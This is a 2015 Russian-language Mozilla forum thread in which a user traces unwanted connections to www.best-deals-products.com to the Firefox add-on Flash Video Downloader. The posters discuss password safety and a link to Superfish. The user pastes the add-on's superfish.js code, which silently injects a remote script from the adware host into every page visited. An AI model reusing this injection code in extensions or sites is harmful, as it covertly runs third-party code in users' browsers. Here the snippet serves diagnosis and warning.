Удаление www.best-deals-products.com | Форум Mozilla Россия

>Форум Mozilla Россия
   http://forum.mozilla-russia.org/index.php
>Firefox
   http://forum.mozilla-russia.org/viewforum.php?id=4
>Удаление www.best-deals-products.com
   http://forum.mozilla-russia.org/viewtopic.php?id=67217

Smoke_kz > 26-04-2015 11:19:12

Добрый день.
При загрузке любой страницы Firefox ESR 31.5.3 соединяется с каким-то левым сайтом www.best-deals-products.com. Поиск с таким именем среди файлов/папок и расширений/плагинов и в about:config результата не дал. Антивирусы молчат. Поиск в гугле дал какие-то левые инструкции, которые не помогают. На хоботе оставил пост с просьбой местных гуру помочь, пока жду. Грешу всё же на вирус. Где и что ещё посмотреть в настройках Firefox?

Проверил Firefox с новым профилем - ситуация не повторяется. Сделал полнотекстовый поиск по всем файлам всех дополнений. Короче, виновато дополнение Flash Video Downloader. Видимо, недавно обновилось и вот такую свинью подложило. В файле superfish.js есть код:

Выделить код

Код:

if( !win.superfish ){
                
            dump("\n\nInsert superfish into: "+ document.location.href +"\n\n");
                    
            var userId = getUUID();

            //var injectUrl = "www.best-deals-products.com/ws/sf_main.jsp?dlsource=lwjyocpk&CTID=xyz";            
            //var injectUrl = "www.superfish.com/ws/sf_main.jsp?dlsource=vjartpv&CTID=fvdmoz";
            var injectUrl = "www.best-deals-products.com/ws/sf_main.jsp?dlsource=vjartpv&CTID=fvdmoz";
            
            if( document.location.href.indexOf("https:") === 0 ){
                injectUrl = "https://" + injectUrl;
            }
            else{
                injectUrl = "http://" + injectUrl;
            }

            var script = document.createElement("script");
            script.setAttribute( "src", injectUrl );
            document.head.appendChild( script );

Менять пароли?
Кстати, не я один столкнулся с этой проблемой - https://addons.mozilla.org/ru/firefox/addon/flash-video-downloader/reviews/

okkamas_knife > 26-04-2015 13:22:56

похоже да, я бы после такой фигни и пароли бы сменил и расширение с разработчиком в свой черный список занёс.

Smoke_kz > 26-04-2015 14:12:34

okkamas_knife пишет

похоже да, я бы после такой фигни и пароли бы сменил и расширение с разработчиком в свой черный список занёс.

Уже занёс и на странице дополнения отписался. Теоретический вопрос - есть ли у расширений доступ к базе, где Firefox хранит пароли? А если используется мастер-пароль? Пароли, конечно, в любом случае поменяю.
На хоботе ничего страшного в моих логах не увидели, т.е. вирусов и прочих червей нет.

okkamas_knife > 26-04-2015 15:34:18

1 очевидно же что да - иначе как бы работал например Password Exporter
2 расширение имеет доступ к системе ограниченный лишь правами юзера запустившего ФФ
может запускать софт править реестр итд.. соответственно чтоб получить пароли закрытые мастер-паролем достаточно чтоб юзер один раз набрал этот самый мастер-пароль.

Dexu > 26-04-2015 16:09:15

Наверное тот же Superfish, что и у Lenovo.

Программное обеспечение Superfish, установленное на компьютерах Lenovo, воздействует на работу таких браузеров, как Internet Explorer и Google Chrome.
Следует отметить, что браузер Mozilla Firefox защищён от воздействия проблемы «man-in-the-middle» при SSL-соединении, так как имеет собственное хранилище сертификатов.

Вот и приходится искать другие пути проникновения.

http://www.3dnews.ru/909764

Smoke_kz > 26-04-2015 22:01:55

тема закрыта